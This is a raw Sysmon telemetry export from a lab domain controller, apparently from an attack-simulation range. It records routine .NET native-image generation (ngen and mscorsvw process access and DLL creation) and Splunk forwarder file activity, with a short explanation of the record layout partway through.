21:04:23.618{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45BFE71A8E045F96AAC47CFA88F5FB63,SHA256=692672E8DECDF131581878671F4C51282AD961F9372B81F7B17EC0223D391850,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.571{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B503-00000000CF01}7032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020717Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.556{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D7-60D3-B503-00000000CF01}7032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:23.556{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D7-60D3-B503-00000000CF01}7032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:23.462 (continuation of the ProcessAccess record whose header is on the preceding line) SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourcePidTid=844368 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A1D7-60D3-B403-00000000CF01} TargetProcessId=7076 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

Record layout: the export ran all fields of each Sysmon event together; below they are labelled in Sysmon schema order, one event per line. Every record shares Channel=Microsoft-Windows-Sysmon/Operational, Computer=win-dc-663.attackrange.local, Level=4, Opcode=0, Keywords=0x8000000000000000 and Task=EventID; the schema Version is 3 for EventID 10, 2 for EventID 11 and 5 for EventID 23. In EventID 10 records, SourcePidTid is SourceProcessId immediately followed by SourceThreadId, with the delimiter between them lost.

EventID=10 (ProcessAccess) RecordID=20714 RuleName=- UtcTime=2021-06-23 21:04:23.446 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourcePidTid=412496 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A1D7-60D3-B403-00000000CF01} TargetProcessId=7076 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

EventID=10 (ProcessAccess) RecordID=20713 RuleName=- UtcTime=2021-06-23 21:04:23.446 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourcePidTid=53885396 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A1D7-60D3-B403-00000000CF01} TargetProcessId=7076 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)

EventID=11 (FileCreate) RecordID=20712 RuleName=DLL UtcTime=2021-06-23 21:04:23.431 ProcessGuid={4DB9351A-A1D7-60D3-B303-00000000CF01} ProcessId=3716 Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe TargetFilename=C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e84-0\Microsoft.SecureBoot.Commands.dll CreationUtcTime=2021-06-23 21:04:23.431

EventID=23 (FileDelete) RecordID=20711 RuleName=- UtcTime=2021-06-23 21:04:23.400 ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01} ProcessId=3068 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security Hashes=MD5=5B010DAF68A202C0AD80A3E909B3ABF0,SHA256=F3D35D1B45223B49CF9078295F808153D4605235F3D6C3B450AA5266FCFD9EA3,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=true

EventID=10 (ProcessAccess) RecordID=20710 RuleName=- UtcTime=2021-06-23 21:04:23.368 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourcePidTid=844368 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A1D7-60D3-B303-00000000CF01} TargetProcessId=3716 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

EventID=10 (ProcessAccess) RecordID=20709 RuleName=- UtcTime=2021-06-23 21:04:23.353 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourcePidTid=412432 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A1D7-60D3-B303-00000000CF01} TargetProcessId=3716 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

EventID=10 (ProcessAccess) RecordID=20708 RuleName=- UtcTime=2021-06-23 21:04:23.353 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourcePidTid=53886420 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A1D7-60D3-B303-00000000CF01} TargetProcessId=3716 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)

EventID=10 (ProcessAccess) RecordID=20707 RuleName=- UtcTime=2021-06-23 21:04:23.306 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourcePidTid=844368 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A1D7-60D3-B203-00000000CF01} TargetProcessId=4276 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

EventID=10 (ProcessAccess) RecordID=20706 RuleName=- UtcTime=2021-06-23 21:04:23.290 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourcePidTid=412432 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A1D7-60D3-B203-00000000CF01} TargetProcessId=4276 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

EventID=10 (ProcessAccess) RecordID=20705 RuleName=- UtcTime=2021-06-23 21:04:23.290 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourcePidTid=53885396 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A1D7-60D3-B203-00000000CF01} TargetProcessId=4276 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)

EventID=11 (FileCreate) RecordID=20704 RuleName=DLL UtcTime=2021-06-23 21:04:23.228 ProcessGuid={4DB9351A-A1D6-60D3-B103-00000000CF01} ProcessId=3256 Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe TargetFilename=C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\cb8-0\Microsoft.RightsManagementServices.ServerManager.DeploymentPlugin.dll CreationUtcTime=2021-06-23 21:04:23.228

EventID=23 (FileDelete) RecordID=20767 RuleName=- UtcTime=2021-06-23 21:04:24.978 ProcessGuid={4DB9351A-9DFF-60D3-7600-00000000CF01} ProcessId=3068 User=NT AUTHORITY\SYSTEM Image=C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe TargetFilename=C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational Hashes=MD5=3AB8EEB7A964CB722EF9EBDE84CEEF5A,SHA256=F95D9AE7343C2024A0328451DD5BDFF8EFE7DBA68B43BC879646EBC5629489B0,IMPHASH=00000000000000000000000000000000 IsExecutable=false Archived=true

EventID=10 (ProcessAccess) RecordID=20766 RuleName=- UtcTime=2021-06-23 21:04:24.962 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourcePidTid=844368 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A1D8-60D3-C203-00000000CF01} TargetProcessId=6400 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

EventID=10 (ProcessAccess) RecordID=20765 RuleName=- UtcTime=2021-06-23 21:04:24.946 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourcePidTid=412432 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A1D8-60D3-C203-00000000CF01} TargetProcessId=6400 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

EventID=10 (ProcessAccess) RecordID=20764 RuleName=- UtcTime=2021-06-23 21:04:24.946 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourcePidTid=53885396 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A1D8-60D3-C203-00000000CF01} TargetProcessId=6400 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64)

EventID=11 (FileCreate) RecordID=20763 RuleName=DLL UtcTime=2021-06-23 21:04:24.931 ProcessGuid={4DB9351A-A1D8-60D3-C103-00000000CF01} ProcessId=96 Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe TargetFilename=C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\60-0\Microsoft.Security.Powershell.Cmdlets.dll CreationUtcTime=2021-06-23 21:04:24.931

EventID=10 (ProcessAccess) RecordID=20762 RuleName=- UtcTime=2021-06-23 21:04:24.884 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourcePidTid=844368 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A1D8-60D3-C103-00000000CF01} TargetProcessId=96 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

EventID=10 (ProcessAccess) RecordID=20761 RuleName=- UtcTime=2021-06-23 21:04:24.868 SourceProcessGUID={4DB9351A-9DDB-60D3-0500-00000000CF01} SourcePidTid=412528 SourceImage=C:\Windows\system32\csrss.exe TargetProcessGUID={4DB9351A-A1D8-60D3-C103-00000000CF01} TargetProcessId=96 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f

EventID=10 (ProcessAccess) RecordID=20760 RuleName=- UtcTime=2021-06-23 21:04:24.868 SourceProcessGUID={4DB9351A-A039-60D3-1801-00000000CF01} SourcePidTid=53886420 SourceImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe TargetProcessGUID={4DB9351A-A1D8-60D3-C103-00000000CF01} TargetProcessId=96 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1fffff CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)

EventID=10 (ProcessAccess) RecordID=20759 RuleName=- UtcTime=2021-06-23 21:04:24.821 SourceProcessGUID={4DB9351A-9DDD-60D3-0C00-00000000CF01} SourcePidTid=844368 SourceImage=C:\Windows\system32\svchost.exe TargetProcessGUID={4DB9351A-A1D8-60D3-C003-00000000CF01} TargetProcessId=6296 TargetImage=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe GrantedAccess=0x1000 CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781

